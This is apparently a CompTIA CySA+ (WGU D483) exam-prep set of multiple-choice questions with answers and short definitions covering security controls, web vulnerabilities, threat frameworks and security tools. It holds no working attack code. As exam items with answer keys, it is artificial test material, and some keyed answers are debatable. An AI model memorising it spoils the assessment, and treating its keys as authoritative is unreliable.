WGU D483 CompTia SysA+ Study: Key Terms and Definitions (GUARANTEED SUCCESS)

An organization recently had an attack that resulted in system data loss. The system administrator must now restore the system with a data backup. What functional security control was the system administrator able to implement?

A.Preventative

B.Responsive

C.Corrective

D.Compensating

C.Corrective

The system administrator used a corrective control after the attack. A good example of a corrective control is a backup system that can restore data that an attacker damages during an intrusion.

Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place.

Responsive controls serve to direct corrective actions enacted after the organization confirms the incident. They often document these actions in a playbook.

The compensating control is a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection but uses a different methodology or technology.

A security engineer installs a next-generation firewall on the perimeter of a network. This installation is an example of what type of security control class?

A.Managerial

B.Operational

C.Detective

D.Technical

D.Technical

Firewalls, antivirus software, and operating system (OS) access control models are examples of technical controls. The engineer would implement technical control as a system (hardware, software, or firmware).

The managerial control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

People primarily implement operational control rather than systems. For example, security guards and training programs are operational controls rather than technical controls.

The detective control is a functional control that is not a security control class.

An engineer is considering appropriate risk responses using threat modeling. They are trying to understand which threat actors are in scope for their organization. How does threat modeling identify the principal risks and tactics, techniques, and procedures (TTPs) for which their system may be susceptible? (Select the three best options.)

A.By evaluating the system from an attacker's point of view

B.By evaluating a system from a neutral perspective

C.Through using tools such as diagrams

D.By analyzing the system from the defender's perspective

A C D

Evaluating systems from a neutral perspective is not a method used in threat modeling.

A mission-critical system is offline at an organization due to a zero-day attack. The associated software vendor plans to release a patch to remediate the vulnerability. Which of the following are important patch management considerations for this scenario? (Select the three best options.)

A.A patch test environment

B.Immediate push delivery of critical security patches

C.A specific team responsible for reviewing vendor-supplied newsletters and security patch bulletins

D.A routine schedule for the rollout of noncritical patches

A B C

D. While creating a routine schedule for the rollout of noncritical patches has merit, it does not illustrate important patch management considerations in this example. A security analyst would address noncritical patches at a later time.

A security analyst is reviewing an announcement from the Cybersecurity and Infrastructure Security Agency. Which source of defensive open-source intelligence (OSINT) does the agency represent?

A.CERT

B.Internal sources

C.Government bulletins

D.CSIRT

C. Government bulletins

The government is responsible for protecting the country's constituents and the national infrastructure and publishing various information and advice regarding observed threats. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Agency publishes several types of cybersecurity guidance, including basic informational content and binding operational directives that federal agencies must implement.

A computer emergency response team (CERT) aims to mitigate cybercrime and minimize damage by responding to incidents quickly.

It is important to consider that evidence regarding active threats, reconnaissance activities, and suspicious behavior exists within the protected environment.

A computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems.

Hacktivist

such as Anonymous, WikiLeaks, or LulzSec, use cyber weapons to promote a political agenda. Hacktivists might attempt to obtain and release confidential information to the public domain, perform denial of service (DoS) attacks, or deface websites.

Nation-state

actors have participated in many attacks, particularly on energy and electoral systems. The goals of nation-state actors are primarily espionage and strategic advantage.

A computer emergency response team (CERT) is quickly reacting to an attack on the network infrastructure of a semiconductor manufacturer. What is true about a CERT? (Select the three best options.)

A.CERTS mitigate cybercrime.

B.CERTS work with local law enforcement.

C.CERTS provide knowledge of trending attacks.

D.CERTS publish a wide variety of information concerning threats.

A B C

D. The government is responsible for protecting the country's constituents and the national infrastructure and publishing various information and advice regarding observed threats. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Agency publishes several types of cybersecurity guidance.

A systems administrator is searching for potential vulnerabilities in the network. Which threat-hunting focus area should the administrator examine, as attackers often exploit it through connected systems or physical access?

A.Isolated networks

B.Misconfigured systems

C.Business-critical assets

D.Lateral movements

Isolated networks, such as air-gapped networks or networks with limited connectivity to the internet, are often thought to be more secure. However, attackers can still target these networks by exploiting vulnerabilities in connected systems or through physical access.

CSIRT

computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems.

A system technician reviews system logs from various devices and notices discrepancies between recorded events. The events between the systems are not synchronizing in the correct order. Which configuration should the technician analyze and adjust to ensure proper and accurate logging? (Select the two best options.)

A.NTP

B.GPS

C.PKI

D.SSL

A.NTP

B.GPS

Time drift or time discrepancies can cause the system to create logs with incorrect time stamps. A time source can provide accuracy by using the Network Time Protocol (NTP) on the systems.

Global Positioning System (GPS) is a location-providing technology. GPS does have the ability to provide time synchronization to a system while providing location coordinates.

Public key infrastructure (PKI) is a technology that provides a suite of tools designed to support public/private key management, integrity checks via digital signatures, and authentication. It does not provide time synchronization services.

A secure socket layer (SSL) is an encryption technology. SSL inspection is useful in inspecting encrypted HTTPS traffic; however, it will not provide a solution for time synchronization.

A cloud architect advises an associate to consider a serverless platform for their new endeavor. What benefits would the architect highlight about a serverless platform? (Select the two best options.)

A.Serverless platforms require the management of physical or virtual server instances.

B.There are considerable management demands for file system security monitoring.

C.There is no requirement to provision multiple servers for redundancy or load balancing.

D.The service provider manages the underlying architecture.

C D

A support technician examines the Windows registry for a host on a local area network (LAN). The technician uses which subkey to find username information for accounts used on a computer?

A.SAM

B.SECURITY

C.DEFAULT

D.SYSTEM

A

The Windows registry is a database for storing operating system, device, and software application configuration information. The support technician can use the Security Accounts Manager (SAM), which stores username information for accounts on the current computer.

An engineer is studying the hardware architecture of a company's various systems. The engineer can find the x86 architecture in which of the following items? (Select the three best options.)

A.Desktops

B.ARM-based Tablets

C.Laptops

D.Servers

A C D

B

Advanced RISC Machines (ARM) and x86 are common architectures. The x86 architecture dominates desktops, laptops, and server computers, while the ARM architecture dominates smartphones, tablets, and single-board computers.

A group of security engineers looks to achieve high data enrichment while compiling threat information for review. Which solution will the engineers apply to achieve this goal?

A.Using different data sources

B.Using automation

C.Identifying threat areas

D.Improving accuracy

A. Using different data sources

An engineer enables a lightweight data sharing technology for trigger-based message sharing between security software applications. What automation feature does the engineer implement?

A.Add-ons

B.APIs

C.Webhooks

D.Plugins

C. Webhooks

The engineer will utilize webhooks in an automated messaging solution. They will implement webhooks to send automated messages from applications to other applications when certain events occur.

The engineer can extend the functionality of many security tools with add-ons. In this case, the engineer uses an out-of-the-box solution for the required need.

An application programming interface (API) is a set of functions and procedures that allow two or more applications to integrate. The engineer will use built-in functionality in this case.

Plugins are additions that help to tailor a software product to match requirements more closely. In this case, the engineer will use built-in functionality.

A new software development organization looks to provide a security solution for an existing security product. In doing so, developers at the organization utilize which technology from the existing product's toolkit to provide an integrated solution?

A.SOAR

B.SOC

C.SIEM

D.API

D. API

An application programming interface (API) is a set of functions and procedures that allow two or more applications to integrate. Developers can use the existing product's toolkit for integration.

Security orchestration, automation, and response (SOAR) is a process of using technology to automate identifying, analyzing, and responding to security threats. Using SOAR does not apply to developers.

Security operations centers (SOC) are integral to the success of an organization's information security program. Utilizing a SOC will not help the developers achieve their goals.

Security information and event management (SIEM) automates the collection, analysis, and response to security-related data. The use of a SIEM will not be of help to the developers.

A local city council tasked its Information Technology (IT) department to implement an international-scale cybersecurity framework. The requirement is coming from their cyber security insurance vendor. The vendor warned that this set of frameworks is not freely available. Which industry framework should the IT department investigate?

A.CIS

B.PCI DSS

C.OWASP

D.ISO

D. ISO

The International Organization for Standardization (ISO) manages and publishes a cybersecurity framework called ISO 27k. Obtaining the ISO 27001 standard is not free of charge.

The Center for Internet Security (CIS) benchmarks are a set of security configuration best practices. They provide a secure baseline configuration for various operating systems, applications, and hardware devices.

Payment Card Industry Data Security Standard (PCI DSS) is a global data protection standard established and maintained by a consortium of payment card companies. PCI DSS identifies controls designed to prevent fraud, protect credit, and debit card data.

The Open Web Application Security Project (OWASP) is a nonprofit foundation. OWASP is an international organization that provides unbiased, practical information about application security.

A boutique crafts company would like to set up a new eCommerce website. They are checking out vendors who have put a high level of detail in the security practices and implementation. They want to test a specific vendor's system to verify that it is not vulnerable to malicious actors injecting malformed data into the checkout process. Which kind of scan or test can the company run with permission?

A.Baseline scan

B.Map scan

C.Fuzzing

D.Internal scan

C. Fuzzing

Fuzzing is an unknown environment testing method using specialty software tools designed to identify problems and issues with an application by injecting malformed data into it.

A video production company has a server farm with graphics cards that allows the company to generate computer-generated imagery. Although the servers do not currently store any data and are not expensive, the company wants to ensure the security of its equipment. What is a compelling reason why the company should be proactive in preventing server vulnerabilities?

A.Exploitability

B.Low asset value

C.High asset value

D.Save power consumption

A. Exploitability

Exploitability assesses the likelihood of an attacker weaponizing a vulnerability to achieve its objectives. A malicious actor can illicitly use unused resources to mine crypto.

After doing a forensics audit of malicious activity by a former employee, a company is looking to protect against potential liability. What process should the company follow to protect any evidence?

A.Data validation

B.Chain of custody

C.Legal hold

D.Data analysis

B. Chain of custody

The chain of custody records evidence handling from collection through the presentation in court. The evidence can include hardware components, electronic data, or telephone systems.

A security analyst at a large organization is investigating a recent cyber attack. The analyst needs to determine the most comprehensive framework for analyzing the attack and understanding the different stages of the attack. Which of the following frameworks would be the most comprehensive for the security analyst to use in this scenario?

A.Cyber kill chain

B.Diamond model

C.National Institute of Standards and Technology (NIST)

D.SANS

A. Cyber kill chain

The cyber kill chain is a comprehensive framework for analyzing and understanding the different stages of a cyber attack.

The diamond model of intrusion analysis is a framework used to analyze and understand the different stages of a cyber attack. However, it is less comprehensive and detailed than the cyber kill chain.

The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a set of cybersecurity standards and guidelines, but it does not provide a framework for analyzing the different stages of a cyber attack.

The SANS Institute Top 20 Critical Security Controls is a list of the 20 most important security controls; however, it does not provide a framework for analyzing the different stages of a cyber attack.

A security analyst at a large organization is investigating a recent cyber attack. The analyst needs to determine the most appropriate framework for analyzing the attacker's tactics, techniques, and procedures (TTPs). Which of the following frameworks would be the most appropriate for the security analyst to use?

A.Cyber kill chain

B.MITRE ATT&CK

C.SANS

D.National Institute of Standards and Technology (NIST)

B.MITRE ATT&CK

MITRE ATT&CK is a comprehensive framework for analyzing and understanding the tactics, techniques, and procedures (TTPs) used by attackers in cyber attacks.

A financial organization is dealing with a sudden rise in security incidents. The security analyst has discovered a malware strain behind the incidents. To study its behavior and find a solution, the analyst decides to use a specific tool to isolate and analyze malware behavior. What tool is the analyst using?

A.ScoutSuite

B.Prowler

C.Cuckoo

D.Pacu

C.Cuckoo

The analyst uses Cuckoo, a malware analysis tool, to isolate and execute the malware in a controlled environment, which allows the analyst to study its behavior and determine the best way to mitigate the threat.

ScoutSuite is an open-source multi-cloud security-auditing tool, rather than a tool specifically designed to isolate and analyze malware behavior.

Prowler is a tool for performing Amazon Web Services (AWS) security assessments. It checks for security best practices, vulnerabilities, and network configurations.

Pacu is an Amazon Web Services (AWS) cloud environment exploitation framework. It provides a platform for security researchers to test and exploit vulnerabilities in AWS environments.

A network administrator at a small business is concerned about the increasing number of phishing attacks that are targeting the organization's employees. The administrator wants to implement a comprehensive solution to help protect the organization from these types of attacks. Which of the following solutions would be the most appropriate for the network administrator to use in this scenario?

A.Sender Policy Framework (SPF)

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)

C.DomainKeys Identified Mail (DKIM)

D.Transport Layer Security (TLS)

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)

A security analyst in a large organization observes a recent spike in security incidents. To enhance the endpoint security strategy, an endpoint detection and response (EDR) solution is implemented. Which of the following best describes the key feature of EDR and how it helps the security analyst detect and respond to malicious activity in the organization's network?

A.Automates security-related tasks

B.Provides real-time visibility into endpoint activity

C.Integrates with other security solutions

D.Performs forensic analysis on endpoints

B.Provides real-time visibility into endpoint activity

A security analyst has received a suspicious email that appears to be from a recognized address. The analyst needs to determine if the email is legitimate or not. Which of the following email analysis methods would be the most appropriate for the security analyst to use in this scenario?

A.Email Header Analysis

B.Link and Attachment Analysis

C.Sender Reputation Verification

D.Domain-based Message Authentication (DMARC)

D.Domain-based Message Authentication (DMARC)

A security analyst at a large organization is investigating a recent cyber attack. The analyst needs to determine the most appropriate framework for analyzing the attacker's tactics, techniques, and procedures (TTPs). Which of the following frameworks would be the most appropriate for the security analyst to use?

A.Cyber kill chain

B.MITRE ATT&CK

C.SANS

D.National Institute of Standards and Technology (NIST)

B.MITRE ATT&CK

MITRE ATT&CK is a comprehensive framework for analyzing and understanding the tactics, techniques, and procedures (TTPs) used by attackers in cyber attacks.

While the cyber kill chain provides a detailed view of the different stages of an attack, it does not provide as much detail about the tactics, techniques, and procedures used by the attacker as MITRE ATT&CK.

The SANS Institute Top 20 Critical Security Controls list the 20 most important security controls organizations should implement to protect against cyber attacks. It does not specialize in tactics, techniques, and procedures (TTPs).

While the National Institute of Standards and Technology (NIST) provides a comprehensive view of information security, it does not provide a framework for analyzing tactics, techniques, and procedures (TTPs).

A company has hired a security analyst to perform a comprehensive information gathering and reconnaissance phase of a penetration testing engagement. The analyst needs to use a tool that can automate gathering information about a target and performing reconnaissance on the target network. Which of the following tools is best suited for this task?

A.Aircrack-ng

B.Recon-ng

C.Snort

D.Metasploit

B.Recon-ng

Recon-ng automates the reconnaissance and information-gathering process, making it an ideal choice for the given scenario.

Aircrack-ng tool is primarily for assessing the security of wireless networks. While it is a valuable tool for its intended purpose, it does not cover the comprehensive information. gathering and reconnaissance needed in the given scenario.

Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) tool. While it is a valuable tool for network security, it does not specialize in information gathering and reconnaissance like Recon-ng.

Although Metasploit can be in the later stages of a penetration testing engagement, it is not specifically for the initial information gathering and reconnaissance phase.

A security analyst is conducting an assessment of the network security of a small office. The analyst must determine if any unauthorized devices and services are on the network. What type of scan/sweep would indicate to the security analyst that unauthorized devices and services are running on the network?

A.Port scan

B.Ping sweep

C.TCP sweep

D.UDP sweep

A.Port scan

A security analyst examines suspicious activity on a Linux-based server within the organization's network. The analyst uncovers a file containing an obfuscated script that utilizes system-level commands. Which technique should the analyst use to efficiently investigate potential malicious activities related to this incident on the affected system?

A.Inspect the execution history of PowerShell scripts

B.Examine Python script execution history

C.Review JavaScript scripts output

D.Analyze shell script logs

D.Analyze shell script logs

Analyzing shell script logs would be the most effective way to investigate potential malicious activities related to this incident on the affected Linux-based system. The obfuscated script seems to be utilizing system-level commands, which is typical for shell scripts.

PowerShell is primarily on Windows-based systems, while the affected server is Linux-based.

A security analyst discovers that a new scheduled task is executing an unknown script regularly. Upon further investigation, it shows that the script includes cmdlets that are specific to a certain scripting language. What is the most efficient way for the analyst to identify potentially malicious activity related to this incident on the affected system?

A.Review the output of JavaScript scripts

B.Examine Python script execution history

C.Analyze PowerShell logs

D.Investigate Ruby script dependencies

C.Analyze PowerShell logs

cmdlets unique to a certain language, which the analyst can infer as PowerShell.

A security analyst is conducting a penetration test using Nmap to assess the security posture of an organization's network. The analyst must automate this task on a Linux server to discover open ports on multiple hosts and collect more information about the discovered services before saving the results to a file. They would also like to avoid the need for installing additional software. Which scripting technique should the analyst use to accomplish this task efficiently?

A.Bash

B.JavaScript

C.Python

D.PowerShell

A.Bash

Bash is most Linux-based systems' default command-line shell and scripting language. Given the Linux-based nature of the network described, Bash scripting would be the most suitable technique for automating tasks such as discovering open ports, collecting service information, and saving results to a file.

A security analyst at an organization receives an alert from their security information and event management (SIEM) system. Upon reviewing the log data, the analyst notices an increase in high-privilege actions within the network. What should the analyst prioritize when investigating this issue to identify the potential underlying cause?

A.Investigate unusual network traffic patterns

B.Analyze new user accounts

C.Review application logs for unexpected behavior

D.Examine recent file changes and modifications

B.Analyze new user accounts

The analyst should prioritize analyzing newly created user accounts, as the increase in high-privilege actions may be in relation to the unauthorized introduction of new accounts with elevated permissions.

A software developer at a technology company needs a format to serialize and transmit data between a web application and a server. The format must be lightweight, easily parsed by web browsers, and efficient for frequent network requests. Which data interchange format should the developer use?

A.eXtensible Markup Language (XML)

B.Yet Another Markup Language (YAML)

C.Comma-Separated Values (CSV)

D.JavaScript Object Notation (JSON)

JavaScript Object Notation (JSON) is an ideal choice for web applications due to its lightweight nature, ease of parsing in JavaScript environments, and efficient client-server communication over networks. It is especially well-suited for AJAX (Asynchronous JavaScript and XML) web applications, which often require quick and asynchronous data exchanges between clients and servers.

B.Yet Another Markup Language (YAML)

YAML is known for its human readability. It is often used in configuration files

Comma-Separated Values (CSV)

CSV is straightforward and useful for representing tabular data but lacks the ability to represent more complex, hierarchical data structures that are often needed in web applications

An organization is recently experiencing a series of security incidents, and a security analyst is investigating these incidents. The analyst needs to efficiently identify indicators of potentially malicious activity within the affected applications. What should the analyst focus on to effectively analyze and identify malicious activity within the application environment?

A.Review application logs for unusual patterns or anomalies

B.Conduct a full network vulnerability scan

C.Perform a comprehensive penetration test

D.Implement strict network access control policies

A.Review application logs for unusual patterns or anomalies

A software development team at a financial institution is working on a new online banking platform. They want to follow secure coding best practices and implement parameterized queries to prevent structured query language (SQL) injection attacks. Which of the following scenarios best demonstrates the correct use of parameterized queries for the company?

A.Concatenating user input directly into the SQL query

B.Validating user input using client-side JavaScript

C.Replacing single quotes in user input with double quotes

D.Using an SQL query with placeholders and binding user input to the placeholders

D.Using an SQL query with placeholders and binding user input to the placeholders

Using an SQL query with placeholders and binding user input to them is the correct approach for implementing parameterized queries. Parameterized queries separate user input from the query, preventing SQL injection attacks.

Concatenating user input directly into the SQL query is insecure, as it can expose the application to SQL injection attacks, allowing the attacker to execute malicious input as part of the SQL query.

While input validation is essential, a malicious user can bypass client-side validation. Therefore, relying solely on client-side validation is insufficient to prevent SQL injection attacks.

Replacing single quotes in user input with double quotes is not a comprehensive solution for preventing SQL injection attacks. Instead, parameterized queries offer a more robust defense against such attacks.

Cross-Site Request Forgery (CSRF)

web vulnerability that allows attackers to trick authenticated users into performing unintended actions on a web application without their knowledge.

It focuses on exploiting a user's existing authentication session rather than making requests on behalf of the web server.

Cross-Site Scripting (XSS)

type of web vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users.

Structured Query Language (SQL) injection

web vulnerability allowing attackers to inject malicious SQL queries into an application's database by exploiting input validation flaws.

A security researcher has discovered a vulnerability in a web application that allows an attacker to make requests to internal or external resources on behalf of the web server. Which of the following web vulnerabilities best describes this scenario?

A.Server-Side Request Forgery (SSRF)

B.Cross-Site Request Forgery (CSRF)

C.Cross-Site Scripting (XSS)

D.Structured Query Language (SQL) injection

A.Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) is a type of web vulnerability that allows an attacker to request internal or external resources on behalf of the web server.

A security consultant identified a vulnerability in a web application that allows an attacker to execute arbitrary commands on the target system, potentially gaining full control over it. Which of the following web vulnerabilities best describes this scenario?

A.Directory traversal

B.Remote Code Execution (RCE)

C.Structured Query Language (SQL) injection

D.Server-Side Request Forgery (SSRF)

B.Remote Code Execution (RCE)

Remote Code Execution (RCE) is a type of web vulnerability that allows an attacker to execute arbitrary commands on the target system, potentially gaining full control over it.

Directory traversal

While directory traversal can lead to unauthorized file access, it does not involve executing arbitrary commands on the target system.

A web development company is working on an e-commerce website and wants to ensure that user-generated content, such as product reviews, does not introduce security vulnerabilities. Therefore, they follow secure coding best practices and implement output encoding to mitigate potential risks. What outcome can the company expect from correctly implementing output encoding?

A.Encoding special characters in user-generated content

B.Automatically validating user input before storing it in the database

C.Protecting the application against SQL injection attacks

D.Ensuring that user input is stored in a parameterized query

A.Encoding special characters in user-generated content

The correct approach is to prevent cross-site scripting (XSS) attacks by encoding special characters in user-generated content. Output encoding ensures that special characters in user-generated content are safely encoded, preventing malicious scripts from executing by the browser.

While input validation is important, output encoding specifically addresses the secure handling of user-generated content when displayed, not when stored.

Output encoding focuses on preventing cross-site scripting (XSS) attacks, not structured query language (SQL) injection attacks. Parameterized queries protect against SQL injection attacks.

Ensuring that the system stores user input in a parameterized query is a technique for preventing SQL injection attacks, not an outcome of output encoding.

An e-commerce platform has identified a stack overflow vulnerability in one of its critical applications. The organization has tasked a security analyst with suggesting effective controls to mitigate the risk associated with this vulnerability. Considering the nature of the vulnerability, which control should the analyst recommend?

A.Implementing input validation and sanitization

B.Enabling secure cookie flags

C.Applying Content Security Policy (CSP)

D.Employing Address Space Layout Randomization (ASLR)

D.Employing Address Space Layout Randomization (ASLR)

ASLR is a security technique that randomizes the memory address locations where the system loads application code and data. This randomization makes it more challenging for attackers to exploit stack overflow vulnerabilities.

A software development company has already included planning, implementation, testing, and maintenance stages in its software development lifecycle (SDLC). Which of the following stages did the company NOT include? (Select the two best options.)

A.Testing

B.Design

C.Deployment

D.Post-implementation review

B.Design

C.Deployment

A healthcare organization is developing a web-based patient records system. During the testing phase, security analysts identified several injection flaws that could potentially compromise sensitive patient data. Which controls should the organization implement to mitigate the risks associated with injection flaws?

A.Employ least privilege principles for database access

B.Implement parameterized queries and input validation

C.Use cookies to store user session data

D.Disable security headers in the application

B.Implement parameterized queries and input validation

A security analyst is examining an incident where an attacker exploited a web application to gain unauthorized access to files and resources on the server. The attacker manipulated user input to include external files or traverse the server's directory structure. Which of the following web vulnerabilities are most likely to be responsible for this scenario? (Select the two best options.)

A.Server-Side Request Forgery (SSRF)

B.Cross-Site Request Forgery (CSRF)

C.Local File Inclusion (LFI)

D.Remote File Inclusion (RFI)

C.Local File Inclusion (LFI)

D.Remote File Inclusion (RFI)

Local File Inclusion (LFI) is a type of web vulnerability that allows an attacker to include local files on the server, often resulting in unauthorized access to sensitive files and resources.

Remote File Inclusion (RFI) is a type of web vulnerability that allows an attacker to include external files in a web application.

While Server-Side Request Forgery (SSRF) can lead to unauthorized access to internal resources, it does not involve including external files or traversing the server's directory structure.

While Cross-Site Request Forgery (CSRF) involves malicious requests, it focuses on exploiting a user's existing authentication session rather than including external files or traversing the server's directory structure.

An e-commerce company recently suffered a data breach, and a security audit revealed several vulnerabilities in their web application. The company wants to improve its web application security by following secure coding best practices and enhancing session management. Which of the following actions should the company take to achieve this?

A.Employ HTTPS for all data transmissions

B.Utilize hard-coded credentials

C.Use short session timeouts

D.Disable input validation

C.Use short session timeouts

Using short session timeouts is a secure coding best practice for session management. Short timeouts help prevent unauthorized access to a user's session by reducing the window of opportunity for an attacker to hijack the session.

While employing HTTPS for all data transmissions is a good security practice, it does not directly relate to secure coding best practices or session management.

A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.)

Cuckoo Sandbox

Snort

Joe Sandbox

VirusTotal

Cuckoo Sandbox

Joe Sandbox

CSIRT

computer security incident response team

CERT

computer emergency response team

OSINT

Open Source INTelligence; gathered from publicly available sources

ISAC

(Information Sharing and Analysis Center) Not-for-profit group set up to share sector-specific threat intelligence and security best practices amongst its members.

IOC

Indicators of Compromise

Single Pane of Glass

A single pane of glass is a management console that presents data from multiple sources in a unified display

Device fingerprinting

Device fingerprinting describes the effort taken to identify details about a device more precisely. While a map or discovery scan looks for connected devices, a fingerprint scan focuses attention on an individual device.

Fuzzing (Fuzz Testing)

Identifying problems and issues(vulnurabilities) with the webpage by purposely inputting or injecting malformed data

SCADA

Supervisory control and data acquisition. Typically industrial control systems within large facilities such as power plants or water treatment facilities. Multiple Sites

A company is debating alternative methods for vulnerability scans due to the multiple attempts made on the company's network. The attempts have occurred over the previous year. Which of these methods will provide the most comprehensive evaluation of company devices?

Agentless

Noncredentialed

Agent

Credentialed

Credentialed

Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes.

Maltego

a graphical link analysis tool, it lets you visualize connections within complex data sets, displaying interconnected links

The network team is assessing the cloud infrastructure of an Amazon Web Services (AWS) account and needs to determine which groups have access to the cloud storage. Where should the network team search for the information in the HTML report?

Network VPCs

S3 buckets config

Config dashboard

iam__enum_permissions module

S3 buckets config

The S3 buckets are the storage assets on AWS, and the S3 buckets config section will show a list of groups with access to the buckets via the Identity and Access Management (IAM) policies.

When reviewing the issues on the Arachni web user interface (UI), how can a web administrator determine the way in which the system detected a cross-site scripting vulnerability on a targeted site?

Check the input section

Check the repeater section

Check the dispatchers section

Check the intruder section

Check the input section

Which of the following tools will allow a security analyst to run the module auxiliary/admin/networking/cisco_secure_acs_bypass to scan for vulnerabilities on a Cisco device?

Pacu

Recong-ng

Metasploit Framework

Nmap

Metasploit Framework

Nikto

web server scanner that the security analyst can use to specifically identify vulnerabilities in web servers. It can quickly scan MULTIPLE web servers and provide comprehensive information on any detected vulnerabilities.

Open Source Security Testing Methodology Manual (OSSTMM)

The OSSTMM is a comprehensive security testing methodology that considers vulnerability context considerations. It provides a systematic approach to identifying and assessing vulnerabilities in various systems, including network infrastructure.

A web developer at a startup company is building a new web application. The developer wants to ensure that the application is secure from various types of attacks. Which of the following frameworks would be the most appropriate for the web developer to use?

A.OWASP Web Security Testing Guide

B.International Organization for Standardization (ISO) 27001/27002

C.Open Source Security Testing Methodology Manual (OSSTMM)

D.Control Objectives for Information and related Technology (COBIT)

A.OWASP Web Security Testing Guide

A security analyst at a software development company must identify network threats. They recently discovered a misconfigured server. What should the analyst focus on to secure network and system architecture?

Monitoring network traffic

Assessing attack stage and web application vulnerabilities

Investigating physical security measures

Implementing industry best practices

Assessing attack stage and web application vulnerabilities

A cybersecurity professional must analyze a security incident within an organization. Applying knowledge of attack methodology frameworks is essential to manage the situation effectively and prevent future attacks. Which action should the professional prioritize in this context?

Deploy additional security monitoring tools

Implement stricter access controls on sensitive data

Determine the scope of the incident

Preserve the integrity of digital evidence

Determine the scope of the incident

A cybersecurity analyst is investigating a security incident and must ensure that the collected data remains uncompromised and retains its integrity. Which of the following actions would be the most appropriate to achieve this goal while conducting the investigation?

Regularly back up the collected data to an external storage device

Create and store cryptographic hash values of the collected data

Use a secure collaboration platform to share the data with team members

Encrypt the collected data using a secure encryption algorithm

Create and store cryptographic hash values of the collected data

The analyst can ensure data integrity and verify that no one has tampered with the data collected during the investigation by creating and storing cryptographic hash values. This supports evidence preservation and maintains the chain of custody.

While encryption helps protect data confidentiality, it does not directly ensure data integrity, which is the primary goal in this scenario.

A security analyst is researching an incident that has affected their organization's web server. The analyst must understand the attacker's tactics, techniques, and procedures (TTPs) to prevent future incidents. Which of the following should the analyst prioritize to study and apply attack methodology frameworks effectively?

Implementing a business continuity (BC)/disaster recovery (DR) plan

Performing root cause analysis

Conducting security awareness training

Utilizing threat intelligence tools

Utilizing threat intelligence tools

A security analyst must evaluate the security of a web application. Which tools or methods would be most useful in identifying potential vulnerabilities in the application's code?

Conducting tabletop exercises

Conducting manual code review

Performing a penetration test on the web application

Performing static application security testing

Performing static application security testing(SAST)

An organization is reviewing its incident response plan and wants to improve its overall security posture by streamlining the authentication process for its employees during a security incident. Which of the following approaches can help achieve this goal without compromising security?

Security information and event management (SIEM)

Intrusion detection system (IDS)

Passwordless authentication

Federation

Federation

Federation allows using a single set of credentials across multiple systems to streamline the authentication process during an incident without compromising security.

ScoutSuite

ScoutSuite is an audit tool that collects data such as security misconfigurations. The tool also provides a report of discovered objects, such as virtual machines and containers, which is the consultant's goal.

Arachni

Arachni is an open-source web scanner that tests many vulnerabilities in HTML forms, including code injection, structured query language (SQL) injection, and cross-site scripting (XSS). However, Arachni is not useful to the consultant in this case.

OpenVAS (Open-source Scanner)

OpenVAS is an open-source scanner used to identify vulnerabilities in systems. The consultant could use OpenVas to obtain Common Vulnerability Scoring System (CVSS) scores but not for object identification.

A security analyst compiles a risk report and utilizes the Common Vulnerability Scoring System (CVSS) scores to determine strategies for varying scenarios. If the analyst considers and calculates impact data and confidentiality metrics, which areas are of concern? (Select the two best options.)

The number of systems impacted

The extent to which data is disclosed

The cost to remedy the vulnerability

The potential damage caused by a vulnerability

The extent to which data is disclosed

The potential damage caused by a vulnerability

An unauthenticated attacker exploited a company's web portal that contains customer information, where customers can view their account profile, such as their name, email address, and account balance. Each customer has a unique ID used to retrieve their information from the database. However, the attacker changed the customer ID parameter in the URL to access customers' information. What kind of web application vulnerability did the attacker exploit?

A.Broken access control

B.Security misconfiguration

C.Software and data integrity failures

D.Injection

A.Broken access control

A company is implementing a PKI to enhance the validity of its communications. What is the purpose of PKI in this instance?

A.To provide secure and private communication over the internet

B.To verify the authenticity of digital documents and the identity of users or devices

C.To encrypt data transmissions between servers

D.To detect and prevent unauthorized access to the network

B.To verify the authenticity of digital documents and the identity of users or devices

A cybersecurity analyst uses the Common Vulnerability Scoring System (CVSS) to evaluate the severity of a vulnerability in a company's software. When using the CVSS to evaluate the severity of a software vulnerability, what specific factors should the analyst consider, and why is CVSS an important tool for IT teams to use? (Select the two best options.)

A.Type of vulnerability, affected system, and potential impact; to prioritize remediation efforts

B.Severity, number of systems affected, and potential impact; to allocate resources more effectively

C.Likelihood of exploitation, potential impact, and patch availability; to provide an objective measure of risk

D.Cost of fixing, number of systems affected, and potential impact; to provide a standardized method for assessing severity

A.Type of vulnerability, affected system, and potential impact; to prioritize remediation efforts

C.Likelihood of exploitation, potential impact, and patch availability; to provide an objective measure of risk

A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe?

A.Cryptographic failures

B.Broken access control

C.Security misconfiguration

D.XSS

A.Cryptographic failures

A recently hired risk manager is taking over the organization's operational control responsibilities. Which control responsibility would the risk manager assume in a cybersecurity environment?

A.Encryption of sensitive data during storage and transmission

B.Implementation of firewalls and intrusion detection systems

C.Configuring network devices to synchronize time using Network Time Protocol (NTP)

D.Conducting background checks on new employees

D.Conducting background checks on new employees

A network administrator analyzes data and prioritizes vulnerabilities to ensure the organization's security. The administrator has received an alert regarding a zero-day vulnerability in one of the organization's critical systems. What factors should the network administrator consider to prioritize this vulnerability? (Select the two best options.)

A.Availability of patches

B.Impact of the vulnerability

C.Level of sophistication of threat actors

D.Privacy of the vulnerability

B.Impact of the vulnerability

C.Level of sophistication of threat actors

A web administrator is responsible for the security of a web application. The administrator wants to prevent cross-site scripting (XSS) attacks where user input is reflected back and executed as part of the web page content. Which of the following best practices should the administrator use to achieve this goal?

A.Input validation

B.Output encoding

C.Parameterized queries

D.Strong password policies

B.Output encoding

